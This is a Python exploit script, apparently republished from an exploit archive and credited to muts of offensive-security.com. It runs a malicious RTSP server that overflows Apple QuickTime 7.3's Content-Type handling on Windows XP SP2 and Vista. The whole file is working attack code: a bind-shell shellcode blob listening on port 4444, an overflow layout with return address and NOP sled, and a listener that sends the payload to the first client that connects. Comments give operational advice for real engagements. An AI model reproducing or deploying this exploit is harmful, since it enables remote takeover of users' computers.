Apple QuickTime 7.3 RTSP Response Universal Exploit (Vista / XP)
来源:http://www.offensive-security.com 作者:muts 发布时间:2007-11-26  
#!/usr/bin/python
# Apple QuickTime 7.3 RTSP Response Vista / XPSP2 Universal
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Edited by muts -> offensive-security.com
# http://www.offensive-security.com
#
# Tested on XP SP2 and Vista EN QuickTime/7.3 -- the hard-coded return address
# 0x6686F3C8 below is tied to those builds and will most likely need retargeting
# for any other QuickTime version or Windows locale.
#


import sys
from socket import *

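# --- Malicious RTSP reply -----------------------------------------------------
# The QuickTime client connects to us and we answer with a "200 OK" whose
# Content-Type value is several kilobytes long; that oversized header value is
# the overflow (h07's bug).  Everything the client sees is kept as bytes so the
# script behaves the same under Python 2.7 and Python 3 (on 3 a str payload
# would make socket.send() raise TypeError).
header = (
    b'RTSP/1.0 200 OK\r\n'
    b'CSeq: 1\r\n'
    b'Date: 0x00 :P\r\n'
    b'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n'
    b'Content-Type: %s\r\n'  # <-- overflow
    b'Content-Length: %d\r\n'
    b'\r\n')

# SDP-style body advertised by Content-Length; plausible-looking stream
# description so the client keeps parsing the reply.
body = (
    b'v=0\r\n'
    b'o=- 16689332712 1 IN IP4 0.0.0.0\r\n'
    b's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
    b'i=1.mp3\r\n'
    b't=0 0\r\n'
    b'a=tool:ciamciaramcia\r\n'
    b'a=type:broadcast\r\n'
    b'a=control:*\r\n'
    b'a=range:npt=0-213.077\r\n'
    b'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
    b'a=x-qt-text-inf:1.mp3\r\n'
    b'm=audio 0 RTP/AVP 14\r\n'
    b'c=IN IP4 0.0.0.0\r\n'
    b'a=control:track1\r\n'
)

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
#
# Operational caveat: this is a *bind* shell.  On success the target itself
# listens on TCP/4444 and anyone who can reach that port gets the shell, not
# just the operator.  Swap in a reverse payload (or firewall the port) on a
# real engagement.
shellcode = (b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49"
             b"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x69"
             b"\x58\x50\x30\x41\x31\x41\x42\x6b\x42\x41\x79\x32\x42\x42\x32\x41"
             b"\x41\x42\x30\x41\x41\x58\x38\x42\x42\x50\x75\x39\x79\x4b\x4c\x51"
             b"\x7a\x5a\x4b\x32\x6d\x38\x68\x48\x79\x4b\x4f\x6b\x4f\x4b\x4f\x75"
             b"\x30\x4e\x6b\x30\x6c\x36\x44\x56\x44\x4c\x4b\x57\x35\x77\x4c\x6e"
             b"\x6b\x41\x6c\x76\x65\x50\x78\x34\x41\x58\x6f\x4e\x6b\x70\x4f\x54"
             b"\x58\x6e\x6b\x33\x6f\x71\x30\x64\x41\x48\x6b\x43\x79\x6e\x6b\x67"
             b"\x44\x4e\x6b\x46\x61\x7a\x4e\x64\x71\x4f\x30\x7a\x39\x4c\x6c\x4b"
             b"\x34\x4b\x70\x50\x74\x57\x77\x48\x41\x79\x5a\x46\x6d\x66\x61\x6f"
             b"\x32\x48\x6b\x79\x64\x57\x4b\x36\x34\x45\x74\x34\x68\x74\x35\x4d"
             b"\x35\x4e\x6b\x71\x4f\x77\x54\x53\x31\x6a\x4b\x65\x36\x4c\x4b\x76"
             b"\x6c\x52\x6b\x4c\x4b\x33\x6f\x37\x6c\x75\x51\x5a\x4b\x47\x73\x34"
             b"\x6c\x4e\x6b\x4d\x59\x50\x6c\x44\x64\x75\x4c\x30\x61\x68\x43\x46"
             b"\x51\x6b\x6b\x62\x44\x6e\x6b\x70\x43\x74\x70\x6e\x6b\x71\x50\x66"
             b"\x6c\x4e\x6b\x32\x50\x57\x6c\x4e\x4d\x4c\x4b\x41\x50\x73\x38\x53"
             b"\x6e\x53\x58\x6c\x4e\x30\x4e\x64\x4e\x48\x6c\x76\x30\x4b\x4f\x6b"
             b"\x66\x35\x36\x50\x53\x43\x56\x43\x58\x57\x43\x30\x32\x51\x78\x53"
             b"\x47\x62\x53\x74\x72\x41\x4f\x41\x44\x4b\x4f\x6a\x70\x43\x58\x48"
             b"\x4b\x48\x6d\x4b\x4c\x35\x6b\x52\x70\x59\x6f\x38\x56\x41\x4f\x6d"
             b"\x59\x4a\x45\x61\x76\x4e\x61\x6a\x4d\x47\x78\x76\x62\x50\x55\x62"
             b"\x4a\x63\x32\x6b\x4f\x6e\x30\x61\x78\x4e\x39\x44\x49\x7a\x55\x4c"
             b"\x6d\x30\x57\x39\x6f\x4e\x36\x61\x43\x71\x43\x51\x43\x73\x63\x56"
             b"\x33\x73\x73\x66\x33\x73\x73\x61\x43\x79\x6f\x7a\x70\x70\x66\x65"
             b"\x38\x76\x71\x51\x4c\x43\x56\x36\x33\x4b\x39\x4a\x41\x4d\x45\x31"
             b"\x78\x39\x34\x47\x6a\x70\x70\x4a\x67\x33\x67\x6b\x4f\x4b\x66\x30"
             b"\x6a\x62\x30\x70\x51\x66\x35\x4b\x4f\x7a\x70\x35\x38\x4e\x44\x6e"
             b"\x4d\x54\x6e\x5a\x49\x66\x37\x49\x6f\x6b\x66\x73\x63\x70\x55\x6b"
             b"\x4f\x6a\x70\x65\x38\x5a\x45\x30\x49\x4d\x56\x47\x39\x31\x47\x39"
             b"\x6f\x4e\x36\x52\x70\x53\x64\x62\x74\x76\x35\x59\x6f\x58\x50\x4e"
             b"\x73\x61\x78\x6b\x57\x73\x49\x4b\x76\x43\x49\x63\x67\x4b\x4f\x59"
             b"\x46\x70\x55\x4b\x4f\x4a\x70\x50\x66\x72\x4a\x31\x74\x43\x56\x41"
             b"\x78\x50\x63\x62\x4d\x6f\x79\x48\x65\x33\x5a\x72\x70\x30\x59\x71"
             b"\x39\x68\x4c\x6d\x59\x48\x67\x61\x7a\x43\x74\x6d\x59\x4d\x32\x64"
             b"\x71\x4f\x30\x4c\x33\x4d\x7a\x4b\x4e\x51\x52\x36\x4d\x6b\x4e\x41"
             b"\x52\x64\x6c\x4a\x33\x6e\x6d\x31\x6a\x45\x68\x4e\x4b\x6e\x4b\x4e"
             b"\x4b\x61\x78\x44\x32\x49\x6e\x4c\x73\x66\x76\x39\x6f\x50\x75\x51"
             b"\x54\x49\x6f\x49\x46\x31\x4b\x31\x47\x70\x52\x46\x31\x70\x51\x46"
             b"\x31\x52\x4a\x47\x71\x43\x61\x62\x71\x53\x65\x36\x31\x79\x6f\x5a"
             b"\x70\x33\x58\x4c\x6d\x7a\x79\x45\x55\x6a\x6e\x76\x33\x59\x6f\x6a"
             b"\x76\x50\x6a\x4b\x4f\x79\x6f\x50\x37\x59\x6f\x7a\x70\x4c\x4b\x52"
             b"\x77\x4b\x4c\x4f\x73\x49\x54\x35\x34\x79\x6f\x6b\x66\x51\x42\x59"
             b"\x6f\x38\x50\x30\x68\x5a\x50\x4c\x4a\x66\x64\x51\x4f\x36\x33\x4b"
             b"\x4f\x78\x56\x6b\x4f\x38\x50\x69")

# --- Layout of the Content-Type value -----------------------------------------
# Offsets are relative to the start of the header value.  The 4-byte short
# jump immediately followed by a 4-byte address matches an SEH-style
# nSEH/handler overwrite (and EXITFUNC=seh above points the same way), but that
# is not confirmed here -- NOTE(review): verify in a debugger before porting.
PAD_TO_OVERWRITE = 991               # "A" filler up to the overwritten 8 bytes
JMP_OVER = b"\xeb\x32\x90\x90"       # jmp short +0x32 (+2 nop): skips RET_ADDR and lands in NOP_SLED
RET_ADDR = b"\xC8\xF3\x86\x66"       # 0x6686F3C8 little-endian; specific to the tested 7.3 builds
NOP_SLED = b"\x90" * 64
SHELLCODE_ROOM = 4028                # shellcode + trailing "A" filler always total this many bytes

try:                                 # keep the "press enter" prompt working on 2.7 and 3
    _prompt = raw_input
except NameError:
    _prompt = input


def build_content_type(code=shellcode, ret_addr=RET_ADDR):
    """Return the oversized Content-Type value that triggers the overflow.

    Layout: PAD_TO_OVERWRITE x "A" | JMP_OVER | ret_addr | NOP_SLED | code |
    "A" filler so that code + filler == SHELLCODE_ROOM.  The total length is
    therefore constant (5091 bytes) regardless of the shellcode used.

    code      -- raw shellcode bytes (default: the metasploit bind shell above)
    ret_addr  -- 4-byte little-endian address written over the saved pointer

    Raises ValueError if ret_addr is not exactly 4 bytes or code does not fit
    in SHELLCODE_ROOM.  The original silently produced an empty filler for an
    oversized payload, shifting the whole layout without any warning.
    """
    if len(ret_addr) != 4:
        raise ValueError("ret_addr must be exactly 4 bytes, got %d" % len(ret_addr))
    if len(code) > SHELLCODE_ROOM:
        raise ValueError("shellcode is %d bytes; at most %d fit"
                         % (len(code), SHELLCODE_ROOM))
    return b"".join([
        b"A" * PAD_TO_OVERWRITE,
        JMP_OVER,
        ret_addr,
        NOP_SLED,
        code,
        b"A" * (SHELLCODE_ROOM - len(code)),
    ])


def build_payload(code=shellcode, ret_addr=RET_ADDR):
    """Return the complete malicious RTSP reply (headers + SDP body) as bytes.

    Content-Length is filled with the real body length so the framing stays
    consistent; `header` itself is left untouched (the original mutated it
    in place with `%=`).
    """
    content_type = build_content_type(code, ret_addr)
    return header % (content_type, len(body)) + body


def serve(payload, host="0.0.0.0", port=554):
    """Listen once on host:port, send `payload` to the first client, then hold
    the connection open until the operator presses Enter.

    The target must be made to open an rtsp:// URL pointing at this listener.
    Binding 0.0.0.0 exposes the listener on every interface; pass the address
    of the interface facing the target instead when you can.  Ports below 1024
    typically need elevated privileges.  Both sockets are closed on any exit
    path (the original leaked them on Ctrl-C or an accept() failure).
    """
    listener = socket(AF_INET, SOCK_STREAM)
    try:
        # Allow an immediate re-run; without this a second start right after
        # the first fails with "Address already in use" while in TIME_WAIT.
        listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        listener.bind((host, port))
        listener.listen(1)
        print("[+] Listening on [RTSP] %d" % port)
        client, addr = listener.accept()
        try:
            print("[+] Connection accepted from: %s" % (addr[0]))
            client.recv(1024)          # drain the client's request; its content is irrelevant
            # sendall(): a plain send() may write only part of a ~5 KB reply,
            # leaving the overflow truncated.
            client.sendall(payload)
            _prompt("[+] Done, press enter to quit")
        finally:
            client.close()
    finally:
        listener.close()


def main(argv=None):
    """CLI entry point: ``script.py [listen_host] [listen_port]``.

    Defaults (0.0.0.0, 554) reproduce the original behaviour exactly.
    """
    args = sys.argv[1:] if argv is None else argv
    host = args[0] if len(args) > 0 else "0.0.0.0"
    port = int(args[1]) if len(args) > 1 else 554
    serve(build_payload(), host, port)


if __name__ == "__main__":
    main()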

 